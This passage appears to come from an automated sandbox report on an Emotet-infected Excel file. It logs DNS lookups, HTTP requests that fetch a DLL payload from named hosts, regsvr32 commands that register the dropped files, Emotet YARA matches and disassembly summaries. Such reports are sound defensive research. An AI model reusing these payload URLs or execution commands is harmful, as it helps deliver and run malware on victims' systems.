Aug 6, 2022 09:20:17.905766964 CEST | 53 | 49688 | 8.8.8.8 | 192.168.2.22
Aug 6, 2022 09:20:19.865408897 CEST | 58836 | 53 | 192.168.2.22 | 8.8.8.8
Aug 6, 2022 09:20:19.999242067 CEST | 53 | 58836 | 8.8.8.8 | 192.168.2.22
                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                                                                                                    Aug 6, 2022 09:20:16.169598103 CEST192.168.2.228.8.8.80x9717Standard query (0)www.zardamarine.comA (IP address)IN (0x0001)
                                                                                                                    Aug 6, 2022 09:20:17.766623020 CEST192.168.2.228.8.8.80x2136Standard query (0)kronostr.comA (IP address)IN (0x0001)
                                                                                                                    Aug 6, 2022 09:20:19.865408897 CEST192.168.2.228.8.8.80x410cStandard query (0)labfitouts.comA (IP address)IN (0x0001)
                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                                                                                                    Aug 6, 2022 09:20:16.339459896 CEST8.8.8.8192.168.2.220x9717No error (0)www.zardamarine.comzardamarine.comCNAME (Canonical name)IN (0x0001)
                                                                                                                    Aug 6, 2022 09:20:16.339459896 CEST8.8.8.8192.168.2.220x9717No error (0)zardamarine.com208.67.23.91A (IP address)IN (0x0001)
                                                                                                                    Aug 6, 2022 09:20:17.905766964 CEST8.8.8.8192.168.2.220x2136No error (0)kronostr.com188.132.217.108A (IP address)IN (0x0001)
                                                                                                                    Aug 6, 2022 09:20:19.999242067 CEST8.8.8.8192.168.2.220x410cNo error (0)labfitouts.com66.96.149.19A (IP address)IN (0x0001)
                                                                                                                    • www.zardamarine.com
                                                                                                                    • kronostr.com
                                                                                                                    • labfitouts.com

Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49171 | 208.67.23.91 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.22 | 49172 | 188.132.217.108 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Aug 6, 2022 09:20:17.956005096 CEST | 7 | OUT | GET /tr/68yHRhfuU7Qj/ HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: kronostr.com
                                                                                                                    Connection: Keep-Alive
Aug 6, 2022 09:20:18.101455927 CEST | 9 | IN | HTTP/1.1 200 OK
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 06 Aug 2022 07:20:16 GMT
                                                                                                                    Content-Type: application/x-msdownload
                                                                                                                    Content-Length: 661504
                                                                                                                    Connection: keep-alive
                                                                                                                    X-Powered-By: PHP/7.1.33
                                                                                                                    Cache-Control: no-cache, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Sat, 06 Aug 2022 07:20:16 GMT
                                                                                                                    Content-Disposition: attachment; filename="UVvnppK.dll"
                                                                                                                    Content-Transfer-Encoding: binary
                                                                                                                    Set-Cookie: 62ee1630cc8c8=1659770416; expires=Sat, 06-Aug-2022 07:21:16 GMT; Max-Age=60; path=/
                                                                                                                    Last-Modified: Sat, 06 Aug 2022 07:20:16 GMT
                                                                                                                    X-Powered-By: PleskLin


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.22 | 49173 | 66.96.149.19 | 80 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
Aug 6, 2022 09:20:20.107244015 CEST | 707 | OUT | GET /cgi-bin/Rea3Iu3wGvgAbTset0/ HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: labfitouts.com
                                                                                                                    Connection: Keep-Alive
Aug 6, 2022 09:20:20.218357086 CEST | 708 | IN | HTTP/1.1 200 OK
                                                                                                                    Date: Sat, 06 Aug 2022 07:20:20 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 6424
                                                                                                                    Connection: keep-alive
                                                                                                                    Server: Apache/2
                                                                                                                    Last-Modified: Mon, 26 Aug 2019 18:26:26 GMT
                                                                                                                    Accept-Ranges: bytes
                                                                                                                    Age: 0


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.22 | 49171 | 208.67.23.91 | 443 | C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Timestamp | kBytes transferred | Direction | Data
2022-08-06 07:20:17 UTC | 0 | OUT | GET /images/psQbAjrrEOXWPrS/ HTTP/1.1
                                                                                                                    Accept: */*
                                                                                                                    UA-CPU: AMD64
                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                    Host: www.zardamarine.com
                                                                                                                    Connection: Keep-Alive
2022-08-06 07:20:17 UTC | 0 | IN | HTTP/1.1 404 Not Found
                                                                                                                    Server: nginx
                                                                                                                    Date: Sat, 06 Aug 2022 07:20:17 GMT
                                                                                                                    Content-Type: text/html
                                                                                                                    Content-Length: 961
                                                                                                                    Connection: close
                                                                                                                    Last-Modified: Wed, 04 Jan 2017 19:07:47 GMT
                                                                                                                    ETag: "2a8f73-3c1-54549800fc6c0"
                                                                                                                    Accept-Ranges: bytes


                                                                                                                    Target ID:0
                                                                                                                    Start time:09:19:14
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                                                                    Imagebase:0x13fb20000
                                                                                                                    File size:28253536 bytes
                                                                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:4
                                                                                                                    Start time:09:19:24
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\wdusx1.ocx
                                                                                                                    Imagebase:0xff180000
                                                                                                                    File size:19456 bytes
                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high

                                                                                                                    Target ID:5
                                                                                                                    Start time:09:19:25
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Windows\System32\svchost.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\svchost.exe -k WerSvcGroup
                                                                                                                    Imagebase:0xff7d0000
                                                                                                                    File size:27136 bytes
                                                                                                                    MD5 hash:C78655BC80301D76ED4FEF1C1EA40A7D
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:moderate

                                                                                                                    Target ID:6
                                                                                                                    Start time:09:19:26
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\wdusx2.ocx
                                                                                                                    Imagebase:0xffa70000
                                                                                                                    File size:19456 bytes
                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Emotet_d6ac1ea4, Description: unknown, Source: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Emotet_d6ac1ea4, Description: unknown, Source: 00000006.00000002.924980552.00000000004B0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high

                                                                                                                    Target ID:7
                                                                                                                    Start time:09:19:27
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\system32\regsvr32.exe "C:\Windows\system32\LxvynAbdjmnUIIL\BlVTVcJlqYTKwC.dll"
                                                                                                                    Imagebase:0xffa70000
                                                                                                                    File size:19456 bytes
                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Yara matches:
                                                                                                                    • Rule: JoeSecurity_Emotet_3, Description: , Source: 00000007.00000002.1196956196.00000000003AA000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Emotet_d6ac1ea4, Description: unknown, Source: 00000007.00000002.1197465713.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: JoeSecurity_Emotet_1, Description: Yara detected Emotet, Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                    • Rule: Windows_Trojan_Emotet_db7d33fa, Description: unknown, Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    • Rule: Windows_Trojan_Emotet_d6ac1ea4, Description: unknown, Source: 00000007.00000002.1196882539.0000000000140000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                    Reputation:high

                                                                                                                    Target ID:8
                                                                                                                    Start time:09:19:28
                                                                                                                    Start date:06/08/2022
                                                                                                                    Path:C:\Windows\System32\regsvr32.exe
                                                                                                                    Wow64 process (32bit):false
                                                                                                                    Commandline:C:\Windows\System32\regsvr32.exe /S ..\wdusx3.ocx
                                                                                                                    Imagebase:0xffa70000
                                                                                                                    File size:19456 bytes
                                                                                                                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                                                                                                                    Has elevated privileges:true
                                                                                                                    Has administrator privileges:true
                                                                                                                    Programmed in:C, C++ or other language
                                                                                                                    Reputation:high


                                                                                                                      Execution Graph

                                                                                                                      Execution Coverage:11.5%
                                                                                                                      Dynamic/Decrypted Code Coverage:24%
                                                                                                                      Signature Coverage:23.6%
                                                                                                                      Total number of Nodes:246
                                                                                                                      Total number of Limit Nodes:11

                                                                                                                      Control-flow Graph

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.924704548.0000000000290000.00000040.00001000.00020000.00000000.sdmp, Offset: 00290000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_290000_regsvr32.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Virtual$Alloc$InfoNativeProtectSystem
                                                                                                                      • String ID: Cach$Find$Flus$Free$GetN$Libr$Load$Load$Lock$Reso$Reso$Reso$Reso$RtlA$Size$Slee$Virt$Virt$aryA$ativ$ddFu$eSys$hIns$lloc$ncti$ofRe$onTa$rote$sour$temI$tion$truc$ualA$ualP$urce$urce$urce$urce
                                                                                                                      • API String ID: 2313188843-2517549848
                                                                                                                      • Opcode ID: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                      • Instruction ID: 1403a94883d10214c5499bbd0854d671577000ef03f07f2fc84d7cef1b085270
                                                                                                                      • Opcode Fuzzy Hash: 590c178917582490f2a8474f3428d2fdec128c188f960b73743dba758a98ecc8
                                                                                                                      • Instruction Fuzzy Hash: 2772D430628B4D8FDB29DF18C8856B9B7E1FF98305F10462DE88AD7211DB34E956CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: K$PCX$\$cN$cN$mglc
                                                                                                                      • API String ID: 0-3545230515
                                                                                                                      • Opcode ID: c1fdca24d7289c16ee968c380491a6baa18fcaf7badf80a2097371b2ab0776b6
                                                                                                                      • Instruction ID: 9d8718672c2d6d0bcf53842bce2800f73cef94a4a98ee0308dd9f663bb3f9fa5
                                                                                                                      • Opcode Fuzzy Hash: c1fdca24d7289c16ee968c380491a6baa18fcaf7badf80a2097371b2ab0776b6
                                                                                                                      • Instruction Fuzzy Hash: D2F114705053C8CBEBBADFA4D885BD97BE8FB44B44F10621EE84AEE250DBB057458B01
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 5C>$L*$a5<$fc![
                                                                                                                      • API String ID: 0-235361486
                                                                                                                      • Opcode ID: b97bc571248e38f113afb338e01918a3a6b823abb22c6ba48f105073ed6cd74d
                                                                                                                      • Instruction ID: 9998e5c752019cb6b430208424de95954be9251b1b4d5ab6f443f1bc48a175e6
                                                                                                                      • Opcode Fuzzy Hash: b97bc571248e38f113afb338e01918a3a6b823abb22c6ba48f105073ed6cd74d
                                                                                                                      • Instruction Fuzzy Hash: AB52FC7150078E8BDB89DF24C88A6DF3BB1FB58384F104619FC56862A1D7B4DA65CBC1
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 279 180026c08-180026cb7 call 18000488c 282 180026cba-180026cc0 279->282 283 180026cc6 282->283 284 18002701e-180027024 282->284 285 180026e8b-180027019 call 1800104b4 call 1800030dc 283->285 286 180026ccc-180026cd2 283->286 287 18002702a-180027030 284->287 288 18002716e-1800272af call 18001de84 284->288 320 18002734c-180027355 285->320 290 180026cd8-180026cde 286->290 291 180026e0a-180026e86 call 180019acc 286->291 293 180027036-18002703c 287->293 294 18002710a-180027169 call 18000da94 287->294 309 180027347 288->309 310 1800272b5-180027342 call 180002338 288->310 298 180026ce4-180026cea 290->298 299 180026e00-180026e05 290->299 315 180026def-180026dfb 291->315 301 18002709c-180027105 call 180007314 293->301 302 18002703e-180027044 293->302 294->315 307 180027369-1800273f0 call 180019acc 298->307 308 180026cf0-180026cf6 298->308 299->282 301->315 311 180027358-18002735e 302->311 312 18002704a-18002708c call 18000da94 302->312 323 1800273f5-180027415 307->323 317 180026cf8-180026cfe 308->317 318 180026d1b-180026dd6 call 1800257c8 308->318 309->320 310->315 322 180027364 311->322 311->323 312->323 329 180027092-180027097 312->329 315->282 317->311 324 180026d04-180026d19 317->324 328 180026ddb-180026de9 318->328 320->311 322->282 324->282 328->315 329->315
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: #X$.-do$7YDt${a
                                                                                                                      • API String ID: 0-3334731176
                                                                                                                      • Opcode ID: 7c1d8a624a65d210eaf3644e481d388509668dda593a1a9ed875fce1846e7827
                                                                                                                      • Instruction ID: 407e1fc48498caf3ffe03eb6f42b81827d1d771d2b34bc3c922525223c45a6c0
                                                                                                                      • Opcode Fuzzy Hash: 7c1d8a624a65d210eaf3644e481d388509668dda593a1a9ed875fce1846e7827
                                                                                                                      • Instruction Fuzzy Hash: 55321CB1E0470DDFCB59DFA8C496AAEBBF2FB44348F00815DD806A7250DBB49619CB85
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 330 180007e9c-180007ebb 331 180007ebd 330->331 332 180007ec2-180007ec4 331->332 333 180007eca-180007ed0 332->333 334 18000818b-18000823c call 180010b00 332->334 335 180007ed6-180007edc 333->335 336 1800083f0-18000845f call 180024528 333->336 340 180008241-18000826c 334->340 338 180007ee2-180007ee8 335->338 339 180008298-1800083ee call 180019acc * 2 335->339 347 180008464-18000846e 336->347 342 180008084-180008186 call 18000da94 * 2 338->342 343 180007eee-180007ef4 338->343 339->347 344 18000827d 340->344 345 18000826e-180008278 340->345 342->331 348 180008287-18000828d 343->348 349 180007efa-180007ffa call 18001018c call 180017d58 343->349 350 180008282 344->350 345->331 348->347 354 180008293 348->354 362 180007fff-18000807f call 180014770 349->362 350->348 354->332 362->350
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: J}+$]Dr$]#$ve#
                                                                                                                      • API String ID: 0-2992722375
                                                                                                                      • Opcode ID: 7505443a93b81dc84199f2504c4524b08e5c5de8b6a084bba08ba97f84d9de0c
                                                                                                                      • Instruction ID: 29d0108b5b1a2cd5d3357197a04d28c8b4959edb6cbfe223ec27a09b653e96d7
                                                                                                                      • Opcode Fuzzy Hash: 7505443a93b81dc84199f2504c4524b08e5c5de8b6a084bba08ba97f84d9de0c
                                                                                                                      • Instruction Fuzzy Hash: 940205B1510789DFCB98CF28C8CAADD3BA1FB483A8F956219FC0697250D774D885CB84
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8$m$PY<$PY<
                                                                                                                      • API String ID: 0-3790085456
                                                                                                                      • Opcode ID: 262caa4ca98461bc2a825a70ce614e35e667ed997923a009e81a6eb99c446a09
                                                                                                                      • Instruction ID: 50661b9c7e2b468ecdef7ab12e4980882228390d96dc8f814e7201a9439d9fb9
                                                                                                                      • Opcode Fuzzy Hash: 262caa4ca98461bc2a825a70ce614e35e667ed997923a009e81a6eb99c446a09
                                                                                                                      • Instruction Fuzzy Hash: 07E1BD71519784ABC388DF24C5CA94BBBF0FBD4758F906A1DF8968A260D7B0D948CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 380 180027418-180027437 381 18002743c-180027441 380->381 382 180027571-180027608 call 18000f0e4 381->382 383 180027447-18002744c 381->383 392 18002760d-180027612 382->392 385 180027452-180027457 383->385 386 1800274fb-180027561 call 18000da94 383->386 389 18002761d-180027683 call 180007238 385->389 390 18002745d-180027462 385->390 395 180027567-18002756c 386->395 396 18002771f-180027731 386->396 401 180027685-18002768c 389->401 402 180027696-18002771a call 1800030dc 389->402 390->392 394 180027468-1800274f6 call 1800146fc 390->394 392->396 397 180027618 392->397 394->381 395->381 397->381 401->402 402->396
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: $$$$-W
                                                                                                                      • API String ID: 0-958427004
                                                                                                                      • Opcode ID: 728f2fa872192a4342f7b489f0fee1d0bc24f9aa2d215390047f5cca10041ba4
                                                                                                                      • Instruction ID: 5c62a9e5bb0ebea80b6d8a0a4cf984ba25c03a9c6da5d3495d96dbd9c450046b
                                                                                                                      • Opcode Fuzzy Hash: 728f2fa872192a4342f7b489f0fee1d0bc24f9aa2d215390047f5cca10041ba4
                                                                                                                      • Instruction Fuzzy Hash: B791377051078D8FDB89DF24C88A6CE3FA1FB58398F514219FC4AA6260C778D699CBC5
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 411 180020760-1800207b0 call 18000488c 414 1800207b5-1800207b7 411->414 415 180020a7f-180020b21 call 18001e890 414->415 416 1800207bd-1800207c2 414->416 420 180020b26 415->420 418 180020a63-180020a75 call 180016cd8 416->418 419 1800207c8-1800207cd 416->419 418->415 422 1800207d3-1800207d8 419->422 423 1800209cf-180020a59 call 18002618c 419->423 424 180020b2b-180020b30 420->424 427 1800209c0-1800209ca 422->427 428 1800207de-1800207e3 422->428 432 180020a5e Process32FirstW 423->432 424->414 431 180020b36-180020b4e 424->431 427->414 429 1800208c8-1800209a4 call 18000e594 428->429 430 1800207e9-1800207ee 428->430 436 1800209a9-1800209b0 429->436 430->424 433 1800207f4-1800208b3 call 180011e98 430->433 432->418 437 1800208b8-1800208c3 433->437 436->431 438 1800209b6-1800209bb 436->438 437->414 438->414
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: 8?5$*U
                                                                                                                      • API String ID: 0-521334962
                                                                                                                      • Opcode ID: bd09f0eaaa7d8b6cb4ee9dc7186532f8979905593fe3a50f0db8d4fa0a2c1811
                                                                                                                      • Instruction ID: 3c650e26eed24ce641433c8e3b6c77a07efdcf733da9740c3b79e05a0d27df5f
                                                                                                                      • Opcode Fuzzy Hash: bd09f0eaaa7d8b6cb4ee9dc7186532f8979905593fe3a50f0db8d4fa0a2c1811
                                                                                                                      • Instruction Fuzzy Hash: 82A15E705197889FC7A9CF28C4C979EBBE0FB94344F905A1DF8968B261C7B49A44CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Ze$x;UP
                                                                                                                      • API String ID: 0-2687350636
                                                                                                                      • Opcode ID: e2543b2b8656391a18bb95fcc850b47d7f0f50bdd354f5001d4117fcbe1086a9
                                                                                                                      • Instruction ID: 9eafb4431fb5aee701e4b8871ed649e130d7269efd8a768bed4b8e42c5d36229
                                                                                                                      • Opcode Fuzzy Hash: e2543b2b8656391a18bb95fcc850b47d7f0f50bdd354f5001d4117fcbe1086a9
                                                                                                                      • Instruction Fuzzy Hash: F16106B0D0474E8FCF48CFA8D8865EEBBB1FB48308F114219E959A7251C7789A45CF88
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.926408860.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_6_2_180001000_regsvr32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: z5r
                                                                                                                      • API String ID: 0-3122521650
                                                                                                                      • Opcode ID: d0a6c87f6236c6c21aa873f100b81e3b018d58d75f3d25f7ede977d7c1e8f4a7
                                                                                                                      • Instruction ID: 718a83a78f45606ae37033e31037a2514b13625af039691ffd65492d9a97755b
                                                                                                                      • Opcode Fuzzy Hash: d0a6c87f6236c6c21aa873f100b81e3b018d58d75f3d25f7ede977d7c1e8f4a7
                                                                                                                      • Instruction Fuzzy Hash: 53510F714187888FC7B9DF24C89A6CABBF0FF86304F10491DEA8D8B251DB759A45CB42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Control-flow Graph

                                                                                                                      • Executed
                                                                                                                      • Not Executed
                                                                                                                      control_flow_graph 145 61a01540-61a01559 146 61a01574-61a015ba call 61a02d28 CoLoadLibrary 145->146 147 61a0155b-61a01573 145->147 150 61a015c0-61a01616 LoadLibraryW 146->150 151 61a01773-61a017c3 ExitProcess 146->151 154 61a01618-61a01625 150->154 155 61a0166d-61a016e7 atoi VirtualAlloc 150->155 152 61a01801-61a01827 RtlExitUserProcess 151->152 153 61a017c5-61a017d1 151->153 158 61a017dc-61a017eb 153->158 159 61a0163d-61a0164e 154->159 156 61a016e9-61a016fe 155->156 157 61a0173e-61a01765 155->157 162 61a01700-61a0173c 156->162 165 61a0176a-61a0176e 157->165 163 61a017d3-61a017da 158->163 164 61a017ed-61a017fe 158->164 160 61a01630-61a01637 159->160 161 61a01650-61a0166a 159->161 160->159 160->165 161->155 162->157 162->162 163->158 167 61a01830-61a01832 163->167 164->152 165->155 167->152
                                                                                                                      APIs
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000006.00000002.925181874.0000000061A01000.00000020.00000001.01000000.00000006.sdmp, Offset: 61A00000, based on PE: true
                                                                                                                      • Associated: 00000006.00000002.925175993.0000000061A00000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925188473.0000000061A04000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925194126.0000000061A05000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925211021.0000000061A09000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925215436.0000000061A0A000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.925219917.0000000061A0D000.00000008.00000001.01000000.00000006.sdmp
                                                                                                                      • Associated: 00000006.00000002.926363512.0000000061AAA000.00000002.00000001.01000000.00000006.sdmp
